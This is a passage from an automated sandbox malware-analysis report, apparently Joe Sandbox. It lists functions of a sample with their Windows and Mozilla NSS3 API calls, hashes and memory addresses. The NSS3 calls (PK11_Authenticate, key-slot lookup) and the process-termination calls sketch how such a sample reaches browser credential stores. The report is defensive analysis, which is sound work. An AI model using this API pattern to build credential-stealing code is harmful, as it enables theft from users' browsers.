Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 59ca648626beb54dabd58de95645effab556c54f61860a03e3dc0776c71a6f88
Instruction ID: e5f6d54e2f3cffd0e96efd9986d6c1fdb2384ec4583f12cba7c652643e564801
Opcode Fuzzy Hash: 59ca648626beb54dabd58de95645effab556c54f61860a03e3dc0776c71a6f88
Instruction Fuzzy Hash: 30318EB1A012169FEB08CF65CC91ABFBBF5EF86248B14442DD955E7700EB319906CBA0

Function 6C704F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C704F5D
free.MOZGLUE(?), ref: 6C704F74
free.MOZGLUE(?), ref: 6C704F82
GetLastError.KERNEL32 ref: 6C704F90

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: ea94e294aa415d96b861701e6f1225bb37b0d25ed2152ed6ba922b03c41363c1
Instruction ID: 8910448eb2d84d4a3be38ea80d4cbc1c07cbf8b9c4394542483ed71d7bb5ae50
Opcode Fuzzy Hash: ea94e294aa415d96b861701e6f1225bb37b0d25ed2152ed6ba922b03c41363c1
Instruction Fuzzy Hash: BA3137B5B002094BEB01DF69DD81BDBB3F8FF85358F084239E815A7681DB34A90487A1

Function 00EF2330 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00EF2358

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

strtok_s.MSVCRT ref: 00EF244F

Part of subcall function 00EF8640: lstrlen.KERNEL32(00000000,?,?,00EF3D93,00EFE4BB,00EFE4BA,?,?,00EF4A46,00000000,?,013214B8,?,00EFE988,?,00000000), ref: 00EF864B
Part of subcall function 00EF8640: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF86A5

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 09a0200e94cf1acb385eaf53a6f00a51607629417871230422e6de77e369a5f9
Instruction ID: e6f2678471fa5884e621cde16a4a6b4ca91a24e2af3b98bfb652f38613aaa8a3
Opcode Fuzzy Hash: 09a0200e94cf1acb385eaf53a6f00a51607629417871230422e6de77e369a5f9
Instruction Fuzzy Hash: 2F411C71D0020DDFCF08EFA4D955AFEB7B4AF58304F149019E611B6291EF746A48CBA5

Function 00EF73E0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EF73FB

Part of subcall function 00EF6C60: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00EF742E,00000000), ref: 00EF6C6B
Part of subcall function 00EF6C60: HeapAlloc.KERNEL32(00000000,?,?,00EF742E,00000000), ref: 00EF6C72
Part of subcall function 00EF6C60: wsprintfW.USER32 ref: 00EF6C88

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00EF74BB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00EF74D9
CloseHandle.KERNEL32(00000000), ref: 00EF74E6

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 61e6c788199f969c2d12a69551e02ac9b368dd24c4228c4be3c42d1d6387127c
Instruction ID: 05e66b65655ee65dd129dd30cba1d2d8034d1d9fe8c1b0efd00c389494bb6ac1
Opcode Fuzzy Hash: 61e6c788199f969c2d12a69551e02ac9b368dd24c4228c4be3c42d1d6387127c
Instruction Fuzzy Hash: 9F311B71E0021C9BDB24DFE0CD49BEDB7B9BB44300F209469E616AA188DBB46E84CF51

Function 6C634FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C63B60F,00000000), ref: 6C635003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C63B60F,00000000), ref: 6C63501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C63B60F,00000000), ref: 6C63504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C63B60F,00000000), ref: 6C635064

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 30d309ec6305a7ad2b73e1700463bf7688480ebd0c1691bf0f086d4dac3d91b4
Instruction ID: c4de993ffd6217e11f7ea2c82e061654ed626eb9b6ff34e0030952c784630e01
Opcode Fuzzy Hash: 30d309ec6305a7ad2b73e1700463bf7688480ebd0c1691bf0f086d4dac3d91b4
Instruction Fuzzy Hash: D63145B0A04616CFCB00EF68C48466ABBF4FF49308B14A969D89997700EB31E894CBD5

Function 6C5E04D0 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 6C5E04F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5E053B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5E0558
GetLastError.KERNEL32 ref: 6C5E057A

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
String ID:
API String ID: 3051374878-0
Opcode ID: 779514dde3dad00d66cc37afd3c7eda83ada6a9c49b3d3bf4f5e0e33544d5f55
Instruction ID: a743f81dcca4da56d3b068870be551949ce9b4dd1772e660590bb9a7ec283f81
Opcode Fuzzy Hash: 779514dde3dad00d66cc37afd3c7eda83ada6a9c49b3d3bf4f5e0e33544d5f55
Instruction Fuzzy Hash: 61215071A001189FDB04DF59DC94AAEB7B8FF89318B10802AE809DB351DB31ED05CB90

Function 6C662DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C662E08

Part of subcall function 6C6514C0: TlsGetValue.KERNEL32 ref: 6C6514E0
Part of subcall function 6C6514C0: EnterCriticalSection.KERNEL32 ref: 6C6514F5
Part of subcall function 6C6514C0: PR_Unlock.NSS3 ref: 6C65150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C662E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C662E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C662E95

Part of subcall function 6C651200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C651228
Part of subcall function 6C651200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C651238
Part of subcall function 6C651200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C65124B
Part of subcall function 6C651200: PR_CallOnce.NSS3(6C752AA4,6C6512D0,00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C65125D
Part of subcall function 6C651200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C65126F
Part of subcall function 6C651200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C651280
Part of subcall function 6C651200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C65128E
Part of subcall function 6C651200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C65129A
Part of subcall function 6C651200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6512A1

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: ac960cc1aaa8f07915190f69a678c546e55473619db2762abaa26ad4a5ad5c40
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 4F21F6B1D003454BE700CF559D44BAA3764AFA234CF210279DD085BB52F7B1E699C3AB

Function 6C61ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C61ACC2

Part of subcall function 6C5F2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C5F2F0A
Part of subcall function 6C5F2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5F2F1D

Part of subcall function 6C5F2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C5F0A1B,00000000), ref: 6C5F2AF0
Part of subcall function 6C5F2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5F2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C61AD5E

Part of subcall function 6C6357D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C5FB41E,00000000,00000000,?,00000000,?,6C5FB41E,00000000,00000000,00000001,?), ref: 6C6357E0
Part of subcall function 6C6357D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C635843

CERT_DestroyCertList.NSS3(?), ref: 6C61AD36

Part of subcall function 6C5F2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C5F2F65
Part of subcall function 6C5F2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5F2F83

free.MOZGLUE(?), ref: 6C61AD4F

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 142154fe322bc08445ced1ba7c22ac294dfbc07ccb58e71e798dcc9912889886
Instruction ID: 559e1dbac1610503f118301e98d4f6d2f776dbb719f18665519d1311cae8aa45
Opcode Fuzzy Hash: 142154fe322bc08445ced1ba7c22ac294dfbc07ccb58e71e798dcc9912889886
Instruction Fuzzy Hash: EA21C3B1D002548BEB10DF68DC065EEB7F4EF45219F054069D818BBB01FB31AE59CBA9

Function 6C6324E0 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6324FF
EnterCriticalSection.KERNEL32(?), ref: 6C63250F
PR_Unlock.NSS3(?), ref: 6C63253C
PR_SetError.NSS3(00000000,00000000), ref: 6C632554

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 0aaab1c3ef816ebaec40d3e0ab45266a2edd061465bbd382771866bb3dd090cd
Instruction ID: 088671d31439a4bd920655e3e6bfaf82780e440f759afaf07c102a591b6ad7a8
Opcode Fuzzy Hash: 0aaab1c3ef816ebaec40d3e0ab45266a2edd061465bbd382771866bb3dd090cd
Instruction Fuzzy Hash: 36112671E00118ABDB00AF68DC489AB7B78EF4A329B505175EC0D97302EB31E958C7E6

Function 00EF6690 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EFE7D0,00000000,?), ref: 00EF66FF
HeapAlloc.KERNEL32(00000000,?,?,?,?,00EFE7D0,00000000,?), ref: 00EF6706
wsprintfA.USER32 ref: 00EF6720

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Strings

%dx%d, xrefs: 00EF6717

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: af37359acd3ec8eaff59e5a840a85760e88da478c7ddd1a05f961f5b1c0ef23e
Instruction ID: 57f55a17bf4a4cd9456591437adf7b21b9e84919fab6a42114f86c3661a8173f
Opcode Fuzzy Hash: af37359acd3ec8eaff59e5a840a85760e88da478c7ddd1a05f961f5b1c0ef23e
Instruction Fuzzy Hash: 59212EB1E40208AFDB14DF94DD45FAEBBB9FB48711F104119F615A7284C7B5A940CFA1

Function 6C64ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C64F0AD,6C64F150,?,6C64F150,?,?,?), ref: 6C64ECBA

Part of subcall function 6C650FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5F87ED,00000800,6C5EEF74,00000000), ref: 6C651000
Part of subcall function 6C650FF0: PR_NewLock.NSS3(?,00000800,6C5EEF74,00000000), ref: 6C651016
Part of subcall function 6C650FF0: PL_InitArenaPool.NSS3(00000000,security,6C5F87ED,00000008,?,00000800,6C5EEF74,00000000), ref: 6C65102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C64ECD1

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C64ED02

Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C64ED5A

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 113b9051f8760db54d93d23bec20c4388df299b36e42317f1a9ac0e39c4c9f21
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 212184B19007425BE700CF25D944B52B7E4BFA5348F25C215E81C87661EB70E594C7D9

Function 6C61C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C61C890

Part of subcall function 6C618F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C618FAF
Part of subcall function 6C618F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C618FD1
Part of subcall function 6C618F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C618FFA
Part of subcall function 6C618F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C619013
Part of subcall function 6C618F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C619042
Part of subcall function 6C618F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C61905A
Part of subcall function 6C618F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C619073
Part of subcall function 6C618F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C60DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C619111

PR_GetCurrentThread.NSS3 ref: 6C61C8B2

Part of subcall function 6C6B9BF0: TlsGetValue.KERNEL32(?,?,?,6C700A75), ref: 6C6B9C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C61C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C61C8EB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 2ef939a9e12189a620ff28e98dabd06334795956ec57f3e41696156ee137904e
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 8601E566E192107BD74029BD6CC0AFF3E699F4676EF040135FD05A6F11F361881993AE

Function 6C67EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C667FFA,?,6C669767,?,8B7874C0,0000A48E), ref: 6C67EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C667FFA,?,6C669767,?,8B7874C0,0000A48E), ref: 6C67EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C667FFA,?,6C669767,?,8B7874C0,0000A48E), ref: 6C67EE14

Part of subcall function 6C650BE0: malloc.MOZGLUE(6C648D2D,?,00000000,?), ref: 6C650BF8
Part of subcall function 6C650BE0: TlsGetValue.KERNEL32(6C648D2D,?,00000000,?), ref: 6C650C15

memcpy.VCRUNTIME140(?,?,6C669767,00000000,00000000,6C667FFA,?,6C669767,?,8B7874C0,0000A48E), ref: 6C67EE33

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 0666321f3b206263af61db485bc44a9463661b0a9ba60412a72846828492b4d9
Instruction ID: a81714c223a2b176cb6952af72f8b51398652327fe5ac7db0f6c5ac88161da2f
Opcode Fuzzy Hash: 0666321f3b206263af61db485bc44a9463661b0a9ba60412a72846828492b4d9
Instruction Fuzzy Hash: 0D11A7B1A00706AFD7209E65DC84B86B3A8EB0035DF204D31E91982A40E331E4698BF9

Function 6C618DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C618DE7
